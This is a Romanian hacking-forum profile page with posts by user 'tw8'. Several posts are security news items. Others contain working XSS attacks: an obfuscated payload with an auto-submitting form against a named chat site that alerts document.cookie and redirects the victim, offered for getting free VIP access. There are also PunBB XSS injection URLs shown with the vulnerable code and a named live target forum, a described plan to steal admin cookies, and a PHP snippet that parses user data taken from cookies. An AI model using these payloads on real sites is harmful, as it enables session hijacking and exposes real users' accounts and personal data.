Jump to content

tw8

Active Members
  • Posts

    481
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by tw8

  1. de ex eu unul vreau sa stiu cum ma loghez ca vip

    Eu aveam planuri mai marete ... vroiam admin/mod :).

    Ca sa nu fiu suspectat, am zis sa ma folosesc de noul serviciu al lor, h4ckpaste. Am gasit aici o vulnerabilitate de tip XSS (don't worry, just an alert :P):

    http://h4ckpaste.org/?id=XP8qmbsWV6nW7wXgbIN9I8UMnoc

    Astfel, ma gandisem sa pun un cod care sa nu mearga (+ un iframe :P) si sa ii rog sa se uite putin peste cod si sa imi zica care este problema. As fi furat cookie fara sa fiu suspectat :P.

    Totul mergea perfect , dar mi-a scapat ceva: generarea cookie-urilor tine cont si de IP :|.

    Deci, oricat de inventiv as fi, tot degeaba. Cam greu din cauza IP-ului :((.

  2. A fost identificat un nou atac de tip exploit care afecteazã utilizatorii ce deschid documente realizate în versiuni Excel mai vechi.

    Secunia clasificã drept criticã problema ce implicã versiunile Excel 2003, înainte de Service Pack 2. Microsoft a lansat un avertisment referitor la aceastã problemã, nu existã detalii legate de natura ei.

    Într-un avertisment emis de Microsoft, compania îºi sfãtuieºte clienþii sã nu acceseze documente provenite din surse care nu prezintã încredere sau sã foloseascã un instrument denumit Isolated Compatibility Environment (MOICE), care face parte din Office Compatibility Pack, pentru a converti fiºierele în formatul Office Open XML.

    Stire preluata de pe Agora.

    Secunia

  3. MCTI organizeazã pentru prima datã "Ziua siguranþei pe Internet", ediþia 2008

    Ministerul Comunicaþiilor ºi Tehnologiei Informaþiei organizeazã pentru prima datã în România competiþia denumitã “Ziua Siguranþei pe Internet 2008” (“Safer Internet Day 2008”). Tema acesteia este “Viaþa on-line este cea pe care o faci TU!”.

    Evenimentul, organizat la nivel european de cãtre „INSAFE - European Internet Safety Network”, se va derula în perioada 14 Ianuarie - 12 Februarie 2008, având ca scop conºtientizarea pericolelor ce se gãsesc în mediul virtual, precum ºi încurajarea tinerilor în folosirea Internet-ului ºi a celorlalte tehnologii on-line, în acþiuni ºi activitãþi pozitive, sigure ºi eficiente.

    Competiþia se adreseazã grupelor de copii ºi adolescenþi cu vârste cuprinse între 5 ºi 19 ani, din ºcoli, cluburi de tineret, centre de instruire. Obiectivul sãu constã în realizarea unor proiecte multimedia, care sã reflecte ideile ºi viziunile proprii ale tinerilor asupra realitãþii virtuale.

    Concursul se va desfãºura în douã etape: prima, la nivel naþional, pânã la data de 24 Ianuarie 2008, când vor fi anunþaþi câºtigãtorii. Ulterior, ei vor participa la a doua etapã, europeanã, între 1 ºi 12 Februarie 2008.

    Câºtigãtorii europeni ai Concursului „Safer Internet Day 2008” vor fi anunþaþi pe data de 12 Februarie.

    Programul de desfãºurare a concursului este publicat pe site-ul oficial al „Safer Internet Day”, http://www.saferinternet.org/ww/en/pub/insafe/sid.htm.

    Alãturi de MCTI, pentru promovarea, organizarea ºi desfãºurarea acestui eveniment, participã Ministerul Educaþiei, Cercetãrii ºi Tineretului, prin Direcþia Generalã Management Invãþãmânt Preuniversitar, precum ºi Consorþiul “Sigur.info”, format din Fundaþia „Salvaþi Copiii” România, Centrul FOCUS (Centrul Român pentru Copii Dispãruþi ºi Exploataþi Sexual) ºi „Positive Media”, România.

    Mai multe informaþii în versiunea românã despre “Ziua Siguranþei pe Internet 2008”, precum ºi sfaturi utile privind modul cum poate fi realizat proiectul, respectiv înscrierea ºi participarea la competiþie, pot fi accesate de pe site-urile Ministerului Comunicaþiilor ºi Tehnologiei Informaþiilor www.mcti.ro, Ministerului Educaþiei, Cercetãrii ºi Tineretului www.edu.ro sau vizitând site-ul Consorþiului Sigur.info, special destinat acestui eveniment: www.sigur.info, la secþiunile unde va fi afiºat bannerul competiþiei.

    Informaþii referitoare la dezvoltarea unui parteneriat media sau sponsorizare a concursului, cât ºi datele de contact ale reprezentantului oficial sunt publicate pe site-ul www.sigur.info, la pagina web dedicatã competiþiei, în cadrul secþiunilor „Parteneri Media” ºi „Sponsori ºi parteneri”.

    Articol preluat de pe Agora.

    [Offtopic]

    Aveti de gand sa participati (eu da :P)?

    Daca nu putem noi sa ne spunem parerea in legatura cu securitatea, nu stiu cine altcineva ar putea ...

    [Offtopic]

  4. Stick care conþinea secrete NATO, pierdut într-o bibliotecã suedezã

    Descoperirea unui stick USB pe care erau stocate informaþii clasificate ale NATO, într-o bibliotecã din Stockholm, a determinat convocarea unei întruniri de urgenþã între serviciile de secrete de securitate suedeze ºi oficiali ai ministerelor apãrãrii din alte þãri.

    Serviciul Suedez de Informaþii Militare ºi Securitate este o divizie a Comandamentului Central Suedez al Forþelor Armate, responsabil pentru serviciile secrete militare.

    Stick-ul conþinea materiale despre forþele de menþinere a pãcii din Afganistan, precum ºi un raport al serviciilor secrete referitor la tentativa de asasinare a ministrului libanez al apãrãrii ºi uciderea ministrului de externe din Sri Lanka.

    Colonelul Bengt Sandström, de la Serviciul Secret al Armatei, susþine cã o asemenea neglijenþã este intolerabilã ºi cã ar putea fi pedepsitã cu ºase luni de închisoare pentru cel vinovat.

    Tot în 2006, ministrul apãrãrii olandez a raportat pierderea unui alt stick pe care se aflau informaþii sensibile referitoare la serviciul secret al armatei, MIVD.

    Dacã sunt luate mãsuri de securitate corecte, pierderea unui stick USB nu înseamnã neapãrat ºi pierderea informaþiilor. Câteva companii au oferit deja stick-uri USB criptate. Unele pot chiar sã se autodistrugã (intern) ºi sã ºteargã tot ce a fost stocat pe ele, folosind tehnologie care rescrie fiecare byte din datele inscripþionate iniþial, astfel încât datele nu mai pot fi recuperate.

    Articol preluat de pe Agora.

  5. Salut!

    Nota: Daca vreti sa downloadati scriptul sau sa intelegeti, inlocuiti semnul +" cu semnul "-", deoarece se pare ca RST cenzureaza site-ul in cauza :P.

    Era o zi de demult (ieri :P) si ma plictiseam. M-am gandit sa "puric" dupa ceva vulnerabilitati in h4ck+y0u.

    Dupa cateva minute, gasesc in:

    http://www.h4ck+y0u.org/chat/

    o vulnerabilitate XSS.

    Pentru a vedea XSS-ul in actiune, introduceti la nickname (adiseaza un alert):

    tw8"></applet>
    <script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,88,83,83,32,45,32,98,121,32,116,119,56,32,59,41,46,92,110,71,114,101,101,116,122,32,116,111,32,97,108,108,32,82,83,84,32,109,101,109,98,101,114,122,32,58,68,46,34,41,60,47,115,99,114,105,112,116,62))</script>

    Si pentru un exemplu de afisare alert + redirectionare spre RST:

    http://rapidshare.com/files/84075528/h4ck+y0u_XSS_example_by_tw8.html

    Scriptul (unii probabil nu au chef de download):


    <form name="login" action="http://www.h4ck+y0u.org/chat/index.php" method="post" onSubmit="return chkForm();">
    <span class="style16">Nickname:</span> <input name="nick" type="text" value='tw8"></applet>
    <script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,88,83,83,32,45,32,98,121,32,116,119,56,32,59,41,46,92,110,71,114,101,101,116,122,32,116,111,32,97,108,108,32,82,83,84,32,109,101,109,98,101,114,122,32,58,68,46,34,41,60,47,115,99,114,105,112,116,62));alert(document.cookie);document.write(String.fromCharCode(60,77,69,84,65,32,72,84,84,80,45,69,81,85,73,86,61,34,82,101,102,114,101,115,104,34,32,67,79,78,84,69,78,84,61,34,53,59,32,85,82,76,61,104,116,116,112,58,47,47,119,119,119,46,114,115,116,122,111,110,101,46,111,114,103,47,105,110,100,101,120,46,112,104,112,34,62));</script>' ><input type="hidden" name="page" value="chat">


    <input type="submit" value="Connect">
    </form>
    <script>
    document.login.submit();
    </script>

    Acum, puteti avea VIP si pe gratis ... donatorii sunt idioti :)).

    P.S.: Stiu ca il puteam pune la fel de bine si la bug reports, dar eu zic ca e o vulnerabilitate care nu avea ce sa cauta intr-un astfel de site si care merita sa fie discutata.

    Bafta :P, si, daca vreti ceva, ar trebui sa va miscati repede :P.

  6. tw8 pune sursa si nu mai comenta :)

    Ok. Nu am apucat sa il testez, dar bazandu-ma pe cateva observatii matematice, am ajuns la codul asta (asta afla id + anul nasterii):



    //kw3rln
    $aux=$Y;
    $aux=explode('l=', $aux, -1);
    $aux=explode('/o', $aux[1], -1);
    $aux=$c[0];
    $id = '';
    for ($i=0; $i<strlen($aux); $i++)
    {
    $ascii = ord($aux{$i});
    $c = $aux{$i};
    if ($ascii>=48 &&$ascii<=57){$c=chr($ascii+49);}
    elseif ($ascii>=97 && $ascii<=112){$c=chr($ascii+10);}
    elseif ($ascii>=113 && ascii<=122){$c = chr($ascii-65);}
    elseif ($ascii==43){$c = chr(32);}
    $id = $id . $c;
    }
    $id = htmlspecialchars($id);
    // end kw3rln

    // start BanKai
    $aux = explode('&p=', $cookie);
    $aux = $aux[1];
    $aux = explode('&', $aux);
    $aux = $aux[0];

    if ($aux{0} == 'm'){$gender = 'MALE';}
    elseif ($aux{0} == 'f'){$gender = 'FEMALE';}
    else{$gender = '#ERROR';}

    if (ord($aux{1})>=48 && ord($aux{1})<=51)
    {
    if(ord($aux{2}) >= 48 && ord($aux{2})<=57){$year = 1900 + $aux{1}.$aux{2} + 22 * (ord($aux{1})-48);}
    elseif(ord($aux{2})>=97 && ord($aux{2})<=118){$year = 1900 + 22 * (ord($aux{1})-48) + ord($aux{2}) - 87 + 10 * (ord($aux{1})-48);}
    else{$year = '#ERROR';}
    }
    else {$year = '#ERROR';}

    Ar trebui sa mearga perfect, daca vreti, il puteti testa. Desigur, va trebui sa faceti cateva modificari in variabila $html, pentru ca $buni devine, in scriptul meu $id.

    Acum, andrewboy, compara martzoaga tau cu scriptul meu :).

    LE: Am modificat ceva. Incercati-l acum.

  7. tw8 nu te`am intrebat ce ai facut tu....si daca aruncai o mica privire peste cod vedeai ca acelasi lucru am facut..:D ,cel putin in prima functia ....uita`te intai si apoi vorbeste....arata si mie acel cod imbunatatit?:D adica de ce nu il postezi?:D ca oricum tie creditele iti vor fi date in cazul folosirii lor:D

    Il voi posta imediat, trebuie mai intai sa il testez si nu gasesc un hosting calumea.

    Cand il voi posta, astept sa iti retragi injuriile :).

  8. insa nu am idee cum as putea face expresia regulata care in cazul in care este folosit unul dintre caracterele "[^a-z0-9]" sa`l inlocuiasca cu acel caracter respectiv fiecarei litere/cifre din expresie(imi pare rau pentru exprimare)

    Nu e mare lucru asta :P. Exista asta.

    Cat despre imbunatatirea ta ... nu e mare lucru.

    Eu am facut imbunatatiri mult mai bune (nu folosesc nici array si nici atatea if-uri pentru anul nasterii si nick), si, daca Nemessis si BanKai vor, o sa le dau scriptul meu pentru a face cea de-a 3 versiune a grabberului.

  9. Ma refeream la cu totu altceva si cred ca ai inteles cat despre exprimare eu zic ca n-am nevoie sa ma "confrunt" cu dex :D

    Ce ai vrut tu sa zici era inginerie sociala.

    Intr-adevar, si eu am observat lucrul asta la Nemessis, dar e total fals ca ingineria sociala conteaza mai mult decat programarea. Trebuie sa stii cate putin din fiecare ca sa reusesti ceva in lumea asta. Si ... sunt sigur ca multi dintre voi ati folosit ingineria sociala fara macar sa va dati seama ...

    [Ontopic]:

    Bravo BanKai ;).

  10. Salut!

    Am gasit 2 vulnerabilitati de tip XSS in PunBB si m-am gandit sa le impart cu voi :P. Pentru cei care nu stiu ce e PunBB, aruncati o privire pe site-ul oficial.

    Vulnerabilitatea #1 (necesita drepturi de admin/moderator)

    Download script : http://punbb.org/download/punbb-1.2.16.zip


    [url]http://[localhost]/[/url][path]/moderate.php?get_host=0.0.0.0">[script]

    Cod vulnerabil



    if (isset($_GET['get_host']))
    {
    if ($pun_user['g_id'] > PUN_MOD)
    message($lang_common['No permission']);

    // Is get_host an IP address or a post ID?
    if (@preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', $_GET['get_host']))
    $ip = $_GET['get_host'];
    else
    {
    $get_host = intval($_GET['get_host']);
    if ($get_host < 1)
    message($lang_common['Bad request']);

    $result = $db->query('SELECT poster_ip FROM '.$db->prefix.'posts WHERE id='.$get_host) or error('Unable to fetch post IP address', __FILE__, __LINE__, $db->error());
    if (!$db->num_rows($result))
    message($lang_common['Bad request']);

    $ip = $db->result($result);
    }

    message('The IP address is: '.$ip.'
    The host name is: '.@gethostbyaddr($ip).'

    [url="admin_users.php?show_users='.$ip.'"]Show more users for this IP[/url]');
    }

    Vulnerabilitatea #2 (nesesita Private Messaging System instalat)

    Download script: http://www.punres.org/download.php?id=1579


    [url]http://[localhost]/[/url][path]/message_send.php?id=2&tid=">[script]

    Cod vulnerabil



    <input type="hidden" name="topic_redirect" value="<?php echo isset($_GET['tid']) ? $_GET['tid'] : '' ?>" />

    Exemplu de forum vulnerabil cu > 40.000 useri:


    [url]http://www.deblok83.com/forum.php[/url]

    P.S.: Nu am cerut acordul nimanui sa pun RST in titlu, pentru ca kwe e "Stepped Out", iar PM-ul se citeste cam rar. Asa ca, daca nu sunteti de acord, puteti sterge RST din titlu, dar eu nu cred ca e ceva rau :P.

    Bafta :P!

×
×
  • Create New...